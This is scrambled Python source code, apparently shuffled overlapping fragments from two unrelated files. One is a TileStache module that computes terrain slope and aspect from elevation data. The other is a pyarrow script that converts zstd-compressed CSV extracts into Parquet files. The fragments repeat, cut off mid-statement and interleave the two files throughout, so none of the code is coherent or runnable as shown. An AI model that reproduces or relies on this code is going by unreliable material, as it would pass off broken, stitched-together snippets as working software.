Calculate and save slope and aspect. # slope, aspect = calculate_slope_aspect(elevation,", "# slope, aspect = calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0, ymax,", "yres # # Reproject and merge DEM datasources into destination datasets. # driver", "= [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion for (mod, proportion) in", "= 1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without *", "DEM retrieval utilities. \"\"\" from math import pi, sin, cos from os import", "from osgeo import gdal, osr from PIL import Image import numpy from ..", "now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers", "bottom, top = NED1km, NED100m elif zoom == NED100m.ideal_zoom: return [(NED100m, 1)] elif", "= funcpath.split(':', 1) __import__(modname) module = modules[modname] _func = eval(objname, module.__dict__) if _func", "items. \"\"\" if zoom <= NED1km.ideal_zoom: return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom", "a tile directory. \"\"\" def __init__(self, demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\"", "\\ - (window[0] + window[1] + window[1] + window[2])) \\ / (8.0 *", "return [(bottom, proportion), (top, 1 - proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir):", "\"\"\" Return a list of data sources and proportions for given zoom level.", "for flat ground. Aspect is returned in radians, counterclockwise from -pi at north", "interacts with TileStache. \"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir", "return slope, aspect def load_func_path(funcpath): \"\"\" Load external function based on a path.", "providers = [(VFP, 1)] elif self.source == 'worldwide': providers = [(Worldwide, 1)] else:", "cs2cs.TransformPoint(xmax + xres, ymax - yres) # # Keep a version of the", "import Disk from osgeo import gdal, osr from PIL import Image import numpy", "self.source == 'worldwide': providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom) assert sum([proportion", "yres) tile_xform = xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect,", "SRTM3, NED10m elif zoom == SRTM1.ideal_zoom: #return [(SRTM1, 1)] # SRTM1 looks terrible", "proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without", "elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom, top = NED1km, NED100m", "(top, 1 - proportion)] def make_empty_datasource(width, height, xform, wkt, tmpdir): ''' ''' driver", "Return a pair of arrays 2 pixels smaller than the input elevation array.", "tile_xform) class SlopeAndAspect: \"\"\" TileStache response object with PIL-like save() and crop() methods.", "from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator from TileStache.Core import Layer, Metatile", "\"\"\" self.tmpdir = tmpdir self.slope = slope self.aspect = aspect self.w, self.h =", "TileStache. \"\"\" def __init__(self, layer, demdir, tmpdir=None, source='srtm-ned'): self.tmpdir = tmpdir self.demdir =", "if ext.lower() != 'tiff': raise Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height,", "self.tmpdir) proportion_complete = 0. for (module, proportion) in providers: cs2cs = osr.CoordinateTransformation(webmerc_sref, module.sref)", "image. Box is a 4-tuple with left, upper, right, and lower pixels. Not", "a 4-tuple with left, upper, right, and lower pixels. Not yet implemented! \"\"\"", "retrieval utilities. \"\"\" from math import pi, sin, cos from os import unlink,", "<-- otherwise errors will be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref =", "Exception() return 'image/tiff', 'TIFF' def renderArea(self, width, height, srs, xmin, ymin, xmax, ymax,", "pi, sin, cos from os import unlink, close from itertools import product from", "= SRTM1, NED10m # SRTM1 looks terrible bottom, top = SRTM3, NED10m elif", "add up to one. Return list has either one or two items. \"\"\"", "xform, wkt, tmpdir): ''' ''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-',", "zoom): \"\"\" Return an instance of SlopeAndAspect for requested area. \"\"\" assert srs", "# in radians counterclockwise, from -pi at north back to pi aspect =", "used to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 #", "= SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs) class SeedingLayer (Layer): \"\"\" Tilestache-compatible seeding layer", "NED1km, SRTM1, SRTM3, VFP, Worldwide from ModestMaps.Core import Coordinate from TileStache.Geography import SphericalMercator", "useful projections. # osr.UseExceptions() # <-- otherwise errors will be silent and useless.", "<-- good enough for now if self.source == 'srtm-ned': providers = choose_providers_srtm(zoom) elif", "/ composite_ds.GetGeoTransform()[1] if dem_samples > area_pixels: # cubic looks better squeezing down resample", "= pi/2 - numpy.arctan(numpy.sqrt(x*x + y*y)) # in radians counterclockwise, from -pi at", "zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1 looks terrible bottom,", "tiledir, tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config = Configuration(cache,", "osgeo import gdal, osr from PIL import Image import numpy from .. import", "(Layer): \"\"\" Tilestache-compatible seeding layer for preparing tiled data. Intended for use in", "buffered by one pixel on all sides minlon, minlat, z = cs2cs.TransformPoint(xmin -", "of SlopeAndAspect for requested area. \"\"\" assert srs == webmerc_proj.srs # <-- good", "(proportion_complete + proportion) proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with", "return [(NED1km, 1)] elif NED1km.ideal_zoom < zoom and zoom < NED100m.ideal_zoom: #bottom, top", "window[7] + window[8]) \\ - (window[0] + window[1] + window[1] + window[2])) \\", "radians counterclockwise, from -pi at north back to pi aspect = numpy.arctan2(x, y)", "aspect, wkt, xform): \"\"\" Instantiate with array of slope and aspect, and minimal", "xmin - xres, xres, 0, ymax - yres, 0, yres # # Reproject", "''' driver = gdal.GetDriverByName('GTiff') handle, filename = mkstemp(dir=tmpdir, prefix='dem-tools-hillup-data-render-', suffix='.tif') close(handle) ds =", "= webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0, ymax - yres, 0,", "make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module, proportion) in providers:", "information on how the SlopeAndAspect object interacts with TileStache. \"\"\" def __init__(self, tmpdir,", "projections. # osr.UseExceptions() # <-- otherwise errors will be silent and useless. webmerc_proj", "elevation[row:(row + height), col:(col + width)] for (row, col) in product(range(3), range(3))] x", "Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of", "extent and projection. # xres = (xmax - xmin) / width yres =", "if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)] elif SRTM3.ideal_zoom < zoom and zoom", "# SRTM1 looks terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom", "import save_slope_aspect # used to prevent clobbering in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter", "# # Prepare information for datasets of the desired extent and projection. #", "raise NotImplementedError() def choose_providers_srtm(zoom): \"\"\" Return a list of data sources and proportions", "of arrays 2 pixels smaller than the input elevation array. Slope is returned", "slope and aspect, and minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope =", "self.demdir = demdir self.source = source def getTypeByExtension(self, ext): if ext.lower() != 'tiff':", "width)] for (row, col) in product(range(3), range(3))] x = ((window[0] + window[3] +", "layer applied for later alpha-blending. # do_blending = bool(proportion_complete > 0 and proportion", "around to pi. Logic here is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height", "calculate_slope_aspect(elevation, xres, yres) tile_xform = xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir,", "== 'srtm-ned': providers = choose_providers_srtm(zoom) elif self.source == 'ned-only': providers = choose_providers_ned(zoom) elif", "zoom level. Each data source is a module such as NED10m or NED1km,", "an instance of SlopeAndAspect for requested area. \"\"\" assert srs == webmerc_proj.srs #", "close from itertools import product from tempfile import mkstemp from sys import modules", "# Calculate and save slope and aspect. # slope, aspect = calculate_slope_aspect(elevation, xres,", "self.slope = slope self.aspect = aspect self.w, self.h = self.slope.shape self.wkt = wkt", "< zoom and zoom < SRTM1.ideal_zoom: #bottom, top = SRTM3, SRTM1 # SRTM1", "zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top = NED100m, NED10m", "NED10m bottom, top = NED100m, NED10m elif zoom >= NED10m.ideal_zoom: return [(NED10m, 1)]", "pixels smaller than the input elevation array. Slope is returned in radians, from", "returned in radians, from 0 for sheer face to pi/2 for flat ground.", "+ proportion) proportion_without = 1 - proportion_with composite_with = composite_ds.ReadAsArray() * proportion_with composite_with", "1)] elif self.source == 'worldwide': providers = [(Worldwide, 1)] else: providers = load_func_path(self.source)(zoom)", "demdir, tiledir, tmpdir, source, size): \"\"\" \"\"\" cache = Disk(tiledir, dirs='safe') config =", "> area_pixels: # cubic looks better squeezing down resample = gdal.GRA_Cubic else: #", "slope, aspect, wkt, xform): \"\"\" Instantiate with array of slope and aspect, and", "upper, right, and lower pixels. Not yet implemented! \"\"\" raise NotImplementedError() def choose_providers_srtm(zoom):", "data source is a module such as NED10m or NED1km, and the proportions", "NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top = NED100m, NED10m elif zoom", "\"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module = modules[modname] _func = eval(objname,", "aspect = numpy.arctan2(x, y) return slope, aspect def load_func_path(funcpath): \"\"\" Load external function", "import product from tempfile import mkstemp from sys import modules import NED10m, NED100m,", "proportion) in providers]) == 1.0 # # Prepare information for datasets of the", "ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt, tile_xform) class SlopeAndAspect: \"\"\" TileStache", "of slope and aspect, and minimal geographic information. \"\"\" self.tmpdir = tmpdir self.slope", "rectangular region from the current image. Box is a 4-tuple with left, upper,", "in /vsimem/, see: # http://osgeo-org.1803224.n2.nabble.com/gdal-dev-Outputting-to-vsimem-td6221295.html vsimem_counter = 1 # # Set up some", "elevation.shape[1] - 2 window = [z * elevation[row:(row + height), col:(col + width)]", "composite_with = composite_ds.ReadAsArray() * proportion_with composite_with += composite_without * proportion_without composite_ds.GetRasterBand(1).WriteArray(composite_with, 0, 0)", "SRTM1 looks terrible bottom, top = SRTM3, NED10m elif SRTM1.ideal_zoom < zoom and", "= gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample) ds_dem = None # # Perform", "dem_samples > area_pixels: # cubic looks better squeezing down resample = gdal.GRA_Cubic else:", "Configuration(cache, '.') Layer.__init__(self, config, SphericalMercator(), Metatile(), tile_height=size) self.provider = Provider(self, demdir, tmpdir, source)", "= source def getTypeByExtension(self, ext): if ext.lower() != 'tiff': raise Exception() return 'image/tiff',", "* yres); # in radians, from 0 to pi/2 slope = pi/2 -", "float(top.ideal_zoom) - float(bottom.ideal_zoom) proportion = 1. - (zoom - float(bottom.ideal_zoom)) / difference return", "#bottom, top = NED100m, NED10m bottom, top = NED100m, NED10m elif zoom >=", "webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0, ymax - yres, 0, yres", "# # Perform alpha-blending if needed. # if do_blending: proportion_with = proportion /", "spline looks better stretching out resample = gdal.GRA_CubicSpline gdal.ReprojectImage(ds_dem, composite_ds, ds_dem.GetProjection(), composite_ds.GetProjection(), resample)", "- proportion)] def choose_providers_ned(zoom): \"\"\" Return a list of data sources and proportions", "import SphericalMercator from TileStache.Core import Layer, Metatile from TileStache.Config import Configuration from TileStache.Caches", "the desired extent and projection. # xres = (xmax - xmin) / width", "gdal.GetDriverByName('GTiff') composite_ds = make_empty_datasource(width+2, height+2, buffered_xform, area_wkt, self.tmpdir) proportion_complete = 0. for (module,", "path. Example funcpath: \"Module.Submodule:Function\". \"\"\" modname, objname = funcpath.split(':', 1) __import__(modname) module =", "is a 4-tuple with left, upper, right, and lower pixels. Not yet implemented!", "= ((window[0] + window[3] + window[3] + window[6]) \\ - (window[2] + window[5]", "zoom and zoom < NED10m.ideal_zoom: #bottom, top = NED100m, NED10m bottom, top =", "/ height area_wkt = webmerc_sref.ExportToWkt() buffered_xform = xmin - xres, xres, 0, ymax", "errors will be silent and useless. webmerc_proj = SphericalMercator() webmerc_sref = osr.SpatialReference() webmerc_sref.ImportFromProj4(webmerc_proj.srs)", "= minlon, minlat, maxlon, maxlat, self.demdir for ds_dem in module.datasources(*ds_args): # estimate the", "wkt, xform): \"\"\" Instantiate with array of slope and aspect, and minimal geographic", "either one or two items. \"\"\" if zoom <= SRTM3.ideal_zoom: return [(SRTM3, 1)]", "self.w, self.h = self.slope.shape self.wkt = wkt self.xform = xform def save(self, output,", "is borrowed from hillshade.cpp: http://www.perrygeo.net/wordpress/?p=7 \"\"\" width, height = elevation.shape[0] - 2, elevation.shape[1]", "__import__(modname) module = modules[modname] _func = eval(objname, module.__dict__) if _func is None: raise", "list has either one or two items. \"\"\" if zoom <= NED1km.ideal_zoom: return", "tile_xform = xmin, xres, 0, ymax, 0, yres return SlopeAndAspect(self.tmpdir, slope, aspect, area_wkt," ]
[ "boxes. BUFFER_SIZE_BYTES = 1000000000 sql_type_lookup: Dict[Type[TypeEngine], str] = { Integer: 'int32', SmallInteger: 'int16',", "Float, String, CHAR, Text, Boolean, Date, DateTime from sqlalchemy.sql.type_api import TypeEngine from src.schemas", "Parquet targets can't handle Parquet dates, so we need to parse and pass", "small build boxes. BUFFER_SIZE_BYTES = 1000000000 sql_type_lookup: Dict[Type[TypeEngine], str] = { Integer: 'int32',", "handle Parquet dates, so we need to parse and pass timestamps Date: 'timestamp[ms]',", "for batch in stream_reader: table = pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close() if __name__ == \"__main__\":", "for c in table.columns.values() if c.autoincrement is not True] return [(name, sql_type_lookup[type(dtype)]) for", "tables: name = table.name print(name) def get_path(prefix: Path, suffix: str): parent_dir = prefix.joinpath(metadata.schema)", "not True] return [(name, sql_type_lookup[type(dtype)]) for name, dtype in cols] def write_files(metadata: AlchemyMetadata)", "= pa.schema(get_fields(table)) column_names = [name for name, dtype in get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names,", "Dict[Type[TypeEngine], str] = { Integer: 'int32', SmallInteger: 'int16', Float: 'float64', String: 'str', CHAR:", "pass timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' } def get_fields(table: AlchemyTable) -> List[Tuple[str, str]]:", "get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file = get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names = [name for", "dates, so we need to parse and pass timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]'", "= pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close() if __name__ == \"__main__\": for m in all_metadata: write_files(m)", "Parquet dates, so we need to parse and pass timestamps Date: 'timestamp[ms]', DateTime:", "parents=True) return parent_dir.joinpath(name).with_suffix(suffix) extract_file = get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file = get_path(PARQUET_PREFIX, \".parquet\") arrow_schema =", "EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many bytes in", "as pcsv from pyarrow import parquet as pq from sqlalchemy import MetaData as", "bring into memory. # Larger sizes result in better compression and slightly faster", "Integer: 'int32', SmallInteger: 'int16', Float: 'float64', String: 'str', CHAR: 'str', Text: 'str', Boolean:", "AlchemyMetadata) -> None: \"\"\" Creates a Parquet file for each table in the", "csv as pcsv from pyarrow import parquet as pq from sqlalchemy import MetaData", "dtype in cols] def write_files(metadata: AlchemyMetadata) -> None: \"\"\" Creates a Parquet file", "pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\",", "= pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch in stream_reader: table = pa.Table.from_batches([batch]) parquet_writer.write_table(table)", "import Path from typing import Dict, Type, Iterator, List, Tuple import pyarrow as", "from typing import Dict, Type, Iterator, List, Tuple import pyarrow as pa from", "import all_metadata from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\")", "sizes result in better compression and slightly faster time, # but don't want", "Path from typing import Dict, Type, Iterator, List, Tuple import pyarrow as pa", "Boolean, Date, DateTime from sqlalchemy.sql.type_api import TypeEngine from src.schemas import all_metadata from src", "to risk OOM issues on small build boxes. BUFFER_SIZE_BYTES = 1000000000 sql_type_lookup: Dict[Type[TypeEngine],", "= 1000000000 sql_type_lookup: Dict[Type[TypeEngine], str] = { Integer: 'int32', SmallInteger: 'int16', Float: 'float64',", "compression and slightly faster time, # but don't want to risk OOM issues", "import MetaData as AlchemyMetadata, Table as AlchemyTable from sqlalchemy import Integer, SmallInteger, Float,", "\"F\"], strings_can_be_null=True) parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options,", "Date, DateTime from sqlalchemy.sql.type_api import TypeEngine from src.schemas import all_metadata from src import", "pyarrow import csv as pcsv from pyarrow import parquet as pq from sqlalchemy", "String, CHAR, Text, Boolean, Date, DateTime from sqlalchemy.sql.type_api import TypeEngine from src.schemas import", "from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How", "'str', CHAR: 'str', Text: 'str', Boolean: 'bool', # Some Parquet targets can't handle", "read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\",", "Parquet file for each table in the schema. \"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values()", "better compression and slightly faster time, # but don't want to risk OOM", "to parse and pass timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' } def get_fields(table: AlchemyTable)", "Integer, SmallInteger, Float, String, CHAR, Text, Boolean, Date, DateTime from sqlalchemy.sql.type_api import TypeEngine", "parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True) return parent_dir.joinpath(name).with_suffix(suffix) extract_file = get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file =", "'timestamp[ms]' } def get_fields(table: AlchemyTable) -> List[Tuple[str, str]]: cols = [(c.name, c.type) for", "slightly faster time, # but don't want to risk OOM issues on small", "def write_files(metadata: AlchemyMetadata) -> None: \"\"\" Creates a Parquet file for each table", "cols = [(c.name, c.type) for c in table.columns.values() if c.autoincrement is not True]", "print(name) def get_path(prefix: Path, suffix: str): parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True) return parent_dir.joinpath(name).with_suffix(suffix)", "parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options)", "get_path(prefix: Path, suffix: str): parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True) return parent_dir.joinpath(name).with_suffix(suffix) extract_file =", "import pyarrow as pa from pyarrow import csv as pcsv from pyarrow import", "'int16', Float: 'float64', String: 'str', CHAR: 'str', Text: 'str', Boolean: 'bool', # Some", "= get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names = [name for name, dtype in", "risk OOM issues on small build boxes. BUFFER_SIZE_BYTES = 1000000000 sql_type_lookup: Dict[Type[TypeEngine], str]", "can't handle Parquet dates, so we need to parse and pass timestamps Date:", "Boolean: 'bool', # Some Parquet targets can't handle Parquet dates, so we need", "= table.name print(name) def get_path(prefix: Path, suffix: str): parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True)", "import Dict, Type, Iterator, List, Tuple import pyarrow as pa from pyarrow import", "we need to parse and pass timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' } def", "for name, dtype in cols] def write_files(metadata: AlchemyMetadata) -> None: \"\"\" Creates a", "but don't want to risk OOM issues on small build boxes. BUFFER_SIZE_BYTES =", "parse and pass timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' } def get_fields(table: AlchemyTable) ->", "name, dtype in cols] def write_files(metadata: AlchemyMetadata) -> None: \"\"\" Creates a Parquet", "[name for name, dtype in get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True)", "need to parse and pass timestamps Date: 'timestamp[ms]', DateTime: 'timestamp[ms]' } def get_fields(table:", "parent_dir.joinpath(name).with_suffix(suffix) extract_file = get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file = get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names", "Text: 'str', Boolean: 'bool', # Some Parquet targets can't handle Parquet dates, so", "and slightly faster time, # but don't want to risk OOM issues on", "How many bytes in each CSV chunk to bring into memory. # Larger", "parquet_file = get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table)) column_names = [name for name, dtype", "version=\"2.0\", use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options, convert_options=convert_options) for batch in stream_reader: table", "result in better compression and slightly faster time, # but don't want to", "[(name, sql_type_lookup[type(dtype)]) for name, dtype in cols] def write_files(metadata: AlchemyMetadata) -> None: \"\"\"", "src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many", "= { Integer: 'int32', SmallInteger: 'int16', Float: 'float64', String: 'str', CHAR: 'str', Text:", "pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd',", "src.schemas import all_metadata from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX =", "= pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema,", "CHAR, Text, Boolean, Date, DateTime from sqlalchemy.sql.type_api import TypeEngine from src.schemas import all_metadata", "typing import Dict, Type, Iterator, List, Tuple import pyarrow as pa from pyarrow", "import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many bytes", "sqlalchemy.sql.type_api import TypeEngine from src.schemas import all_metadata from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX", "DateTime: 'timestamp[ms]' } def get_fields(table: AlchemyTable) -> List[Tuple[str, str]]: cols = [(c.name, c.type)", "cols] def write_files(metadata: AlchemyMetadata) -> None: \"\"\" Creates a Parquet file for each", "each table in the schema. \"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for table in", "pq from sqlalchemy import MetaData as AlchemyMetadata, Table as AlchemyTable from sqlalchemy import", "in better compression and slightly faster time, # but don't want to risk", "{ Integer: 'int32', SmallInteger: 'int16', Float: 'float64', String: 'str', CHAR: 'str', Text: 'str',", "MetaData as AlchemyMetadata, Table as AlchemyTable from sqlalchemy import Integer, SmallInteger, Float, String,", "the schema. \"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for table in tables: name =", "dtype in get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema,", "SmallInteger, Float, String, CHAR, Text, Boolean, Date, DateTime from sqlalchemy.sql.type_api import TypeEngine from", "in stream_reader: table = pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close() if __name__ == \"__main__\": for m", "Float: 'float64', String: 'str', CHAR: 'str', Text: 'str', Boolean: 'bool', # Some Parquet", "'bool', # Some Parquet targets can't handle Parquet dates, so we need to", "Some Parquet targets can't handle Parquet dates, so we need to parse and", "get_fields(table: AlchemyTable) -> List[Tuple[str, str]]: cols = [(c.name, c.type) for c in table.columns.values()", "AlchemyTable) -> List[Tuple[str, str]]: cols = [(c.name, c.type) for c in table.columns.values() if", "for table in tables: name = table.name print(name) def get_path(prefix: Path, suffix: str):", "def get_path(prefix: Path, suffix: str): parent_dir = prefix.joinpath(metadata.schema) parent_dir.mkdir(exist_ok=True, parents=True) return parent_dir.joinpath(name).with_suffix(suffix) extract_file", "return parent_dir.joinpath(name).with_suffix(suffix) extract_file = get_path(EXTRACT_PATH_PREFIX, \".csv.zst\") parquet_file = get_path(PARQUET_PREFIX, \".parquet\") arrow_schema = pa.schema(get_fields(table))", "str] = { Integer: 'int32', SmallInteger: 'int16', Float: 'float64', String: 'str', CHAR: 'str',", "from sqlalchemy.sql.type_api import TypeEngine from src.schemas import all_metadata from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX", "many bytes in each CSV chunk to bring into memory. # Larger sizes", "targets can't handle Parquet dates, so we need to parse and pass timestamps", "parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True)", "OOM issues on small build boxes. BUFFER_SIZE_BYTES = 1000000000 sql_type_lookup: Dict[Type[TypeEngine], str] =", "# Some Parquet targets can't handle Parquet dates, so we need to parse", "= pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"],", "strings_can_be_null=True) parquet_writer = pq.ParquetWriter(parquet_file, schema=arrow_schema, compression='zstd', version=\"2.0\", use_dictionary=True) stream_reader = pcsv.open_csv(extract_file, read_options=read_options, parse_options=parse_options,", "from src.schemas import all_metadata from src import EXTRACT_PATH_PREFIX, TRANSFORM_PATH_PREFIX PARQUET_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX", "as pa from pyarrow import csv as pcsv from pyarrow import parquet as", "TRANSFORM_PATH_PREFIX.joinpath(\"parquet\") CSV_PREFIX = TRANSFORM_PATH_PREFIX.joinpath(\"csv\") # How many bytes in each CSV chunk to", "as AlchemyMetadata, Table as AlchemyTable from sqlalchemy import Integer, SmallInteger, Float, String, CHAR,", "= metadata.tables.values() for table in tables: name = table.name print(name) def get_path(prefix: Path,", "table = pa.Table.from_batches([batch]) parquet_writer.write_table(table) parquet_writer.close() if __name__ == \"__main__\": for m in all_metadata:", "name, dtype in get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options =", "} def get_fields(table: AlchemyTable) -> List[Tuple[str, str]]: cols = [(c.name, c.type) for c", "pcsv from pyarrow import parquet as pq from sqlalchemy import MetaData as AlchemyMetadata,", "[(c.name, c.type) for c in table.columns.values() if c.autoincrement is not True] return [(name,", "table in the schema. \"\"\" tables: Iterator[AlchemyTable] = metadata.tables.values() for table in tables:", "\"\"\" Creates a Parquet file for each table in the schema. \"\"\" tables:", "Iterator[AlchemyTable] = metadata.tables.values() for table in tables: name = table.name print(name) def get_path(prefix:", "time, # but don't want to risk OOM issues on small build boxes.", "for name, dtype in get_fields(table)] read_options = pcsv.ReadOptions(column_names=column_names, block_size=1000000000) parse_options = pcsv.ParseOptions(newlines_in_values=True) convert_options", "DateTime from sqlalchemy.sql.type_api import TypeEngine from src.schemas import all_metadata from src import EXTRACT_PATH_PREFIX,", "from sqlalchemy import Integer, SmallInteger, Float, String, CHAR, Text, Boolean, Date, DateTime from", "tables: Iterator[AlchemyTable] = metadata.tables.values() for table in tables: name = table.name print(name) def", "from pyarrow import csv as pcsv from pyarrow import parquet as pq from", "convert_options = pcsv.ConvertOptions(column_types=arrow_schema, timestamp_parsers=[\"%Y%m%d\", \"%Y-%m-%d\"], true_values=[\"1\", \"T\"], false_values=[\"0\", \"F\"], strings_can_be_null=True) parquet_writer = pq.ParquetWriter(parquet_file,", "List, Tuple import pyarrow as pa from 